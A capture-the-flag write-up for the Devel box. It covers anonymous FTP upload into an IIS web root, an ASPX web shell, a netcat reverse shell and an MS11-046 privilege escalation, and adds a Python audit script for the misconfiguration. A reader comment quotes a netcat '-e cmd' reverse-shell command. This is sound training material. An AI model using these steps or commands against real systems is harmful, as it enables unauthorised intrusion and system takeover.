PDF with images: https://jdwhitaker.github.io/static/devel.pdf
The Devel box is a great beginner-level challenge. The official walkthrough uses Metasploit. The box hinges on an unrealistic configuration issue: the FTP root is the same as the web root, and anonymous users may upload to the server. We leverage an ASPX web shell to gain a full reverse shell. Identifying the OS version reveals that the machine may be affected by the privilege escalation vulnerability described in MS11-046. This proves to be true, as executing the compiled exploit binary yields full SYSTEM access on the machine.
We nmap the target IP address with the default top ports, performing version scanning (-sV) and default script scanning (-sC).
We find that anonymous FTP login is allowed, and that the server is a Windows machine running IIS 7.5. We also find that the FTP root appears to be the same as the web root. After searching “IIS 7.5 asp” on the web, we find that classic ASP is not installed by default on IIS 7.0 and above. This indicates the server likely supports ASPX instead.
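The root cause here is a configuration problem rather than a software bug, so as an added defender's check (not part of the original write-up) here is a small Python audit of an IIS applicationHost.config that flags any site where anonymous FTP users hold Write permission on a directory that is also served over HTTP(S). The config fragment is constructed for the example, and its layout of the ftpServer authentication and authorization elements is an assumption drawn from the IIS 7.5 schema.

```python
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Constructed applicationHost.config fragment (not taken from the box), laid out the
# way IIS 7.5 stores a site with both an HTTP and an FTP binding.
CONFIG = """<configuration>
 <system.applicationHost><sites>
  <site name="Default Web Site" id="1">
   <application path="/"><virtualDirectory path="/" physicalPath="C:\\inetpub\\wwwroot" /></application>
   <bindings><binding protocol="http" bindingInformation="*:80:" /><binding protocol="ftp" bindingInformation="*:21:" /></bindings>
   <ftpServer><security><authentication><anonymousAuthentication enabled="true" /></authentication></security></ftpServer>
  </site>
 </sites></system.applicationHost>
 <location path="Default Web Site"><system.ftpServer><security><authorization>
  <add accessType="Allow" users="?" permissions="Read, Write" />
 </authorization></security></system.ftpServer></location>
</configuration>"""

def anonymous_ftp_writes_into_web_root(xml_text):
    """Return (ftp_site, web_site, path) for every anonymous-writable FTP root that
    equals, or contains, a directory some site serves over HTTP(S)."""
    root = ET.fromstring(xml_text)
    # Sites whose <location> rules grant Allow + Write to anonymous ("?") or everyone ("*").
    anon_write = set()
    for loc in root.iter("location"):
        for rule in loc.iter("add"):
            if (rule.get("accessType") == "Allow" and rule.get("users") in ("?", "*")
                    and "Write" in rule.get("permissions", "")):
                anon_write.add(loc.get("path"))
    web_roots, ftp_roots = [], []
    for site in root.iter("site"):
        name = site.get("name")
        vdir = site.find("./application[@path='/']/virtualDirectory[@path='/']")
        if vdir is None:
            continue
        phys = PureWindowsPath(vdir.get("physicalPath")).as_posix().lower()
        protos = {b.get("protocol") for b in site.iter("binding")}
        if protos & {"http", "https"}:
            web_roots.append((name, phys))
        anon = site.find("./ftpServer/security/authentication/anonymousAuthentication")
        if "ftp" in protos and anon is not None and anon.get("enabled") == "true" and name in anon_write:
            ftp_roots.append((name, phys))
    findings = []
    for ftp_name, ftp_root in ftp_roots:
        for web_name, web_root in web_roots:
            # Equal roots, or an FTP root that is a parent of the web root, are both exposed.
            if web_root == ftp_root or web_root.startswith(ftp_root.rstrip("/") + "/"):
                findings.append((ftp_name, web_name, ftp_root))
    return findings
```

Disabling anonymous authentication or dropping Write from the anonymous authorization rule makes the finding disappear, which is the fix this box's configuration would need.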
We upload the ASPX web shell and Windows netcat binary included with Kali.
We will use netcat to connect back to our machine for a standard reverse shell.
We use our web shell to identify the location of the netcat binary we uploaded through FTP.
We run a netcat reverse shell back to our local machine.
The OS version is 6.1.7600 N/A Build 7600.
Searching “6.1.7600 N/A Build 7600 privilege escalation” online turns up an exploit at https://www.exploit-db.com/exploits/40564. It exploits the vulnerability described in MS11-046.
We search for MS11-046 with searchsploit, compile the exploit we find [1] [2], and upload it to the remote target.
We execute the binary and gain system access.
We search for the flag files and print them.
Comments
Nice, thanks.
Question: when using the "Execute" command in the web browser...
Is it typed as the entire path of the uploaded nc.exe? Example below:
C:\inetpub\wwwroot\nc.exe -e cmd
Because when I did this, it didn't work... the shell back to the machine didn't catch anything....